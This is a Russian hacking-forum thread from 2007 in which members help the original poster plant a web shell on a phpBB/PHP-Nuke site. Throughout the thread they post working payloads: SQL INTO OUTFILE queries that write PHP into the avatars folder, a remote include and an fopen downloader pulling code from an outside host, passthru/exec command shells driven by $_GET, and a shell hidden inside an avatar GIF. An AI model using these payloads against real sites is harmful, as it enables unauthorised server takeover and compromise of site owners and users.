Форумы Проблемы при заливке шелла

Discussion in 'Уязвимости CMS/форумов' started by Azter, 4 Jul 2007.

  1. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Заливаю шелл через востановление базы в phpbb
    Code:
    SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
    Код исполняется это факт, но когда захожу на
    http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
    Из-за чего такое может быть?
     
  2. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    в папке куда ты залил шел находится конфигурационный файл Апача...
    с параметрами: "первый нах"(шутка, но только про имя параметра...)
     
  3. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    прав не хватает, что бы через бд файл заливать
     
  4. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.
     
    1 person likes this.
  5. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале
    Code:
    SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
    если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код
    Code:
    <? passthru($_GET[cmd]); ?>
    потом юзай shell.php?cmd=ls

    зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )
     
    _________________________
    1 person likes this.
  6. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Возможно просто отключена возможность подключения удаленных файлов через include().
    Создай файл с кодом
    PHP:
    <?
     
    phpinfo();
    ?>
    и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет.
     
    1 person likes this.
  7. nightmare007

    nightmare007 New Member

    Joined:
    28 Oct 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    попробуй

    Code:
    SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';
     
    1 person likes this.
  8. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Такс phpinfo - катит
    allow_url_fopen - on.
    Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
    Хотя все ясно
    allow_url_include - Off
    Чем можно заменить include? кажется можно curl, но как?
     
    #8 Azter, 4 Jul 2007
    Last edited: 4 Jul 2007
  9. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Кстати
    Code:
    <? passthru($_GET[cmd]); ?>
    не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу
     
  10. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Может быть safe_mode = on, тогда не команды не выполняются.
     
    #10 The_HuliGun, 4 Jul 2007
    Last edited: 4 Jul 2007
  11. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    попробуй багу с подменой аватарного пути

    _http://forum.antichat.ru/showpost.php?p=281765&postcount=2
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    хз, пробуй <? exec($_GET[cmd]); ?>
     
  13. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    safe mode - off
    Spyder
    Не катит =(
    maxster
    А смысл? там-же тоже через инклуд(или ты о 7 способе?)
     
    #13 Azter, 5 Jul 2007
    Last edited: 5 Jul 2007
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    а если сделать так?
    Code:
    SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
    Да и с путями разберись
     
  15. Azter

    Azter Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    44
    Likes Received:
    3
    Reputations:
    0
    Code:
    SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
    выбрасывает вот такую фигню
    GrAmOzEkA
    Пару раз уже говорил - не прокатит инклуд.
     
  16. andy13

    andy13 Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    100
    Likes Received:
    15
    Reputations:
    3
    Почему бы просто не сделать так:
    <? passthru("команда"); ?>
    если по-другому не получается ;)
     
  17. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    andy13 - читай пост c411k на 1 странице
     
  18. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву [​IMG] http://c411k.jino-net.ru/upload/achat.gif
    бэкапишь бд с запросом
    Code:
    SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
    и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.
     
    _________________________
    1 person likes this.
  19. andy13

    andy13 Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    100
    Likes Received:
    15
    Reputations:
    3
    Micr0b, я писал про вставку команд напрямую
    passthru("uname -a; id ..."), а не про передачу их через запросы.
     
  20. tbody

    tbody Member

    Joined:
    7 Jul 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    -9
    А если там стоит ASP.Net без ПХП, то что тогда использовать?
    Есть только возможность править страницу.
     
Loading...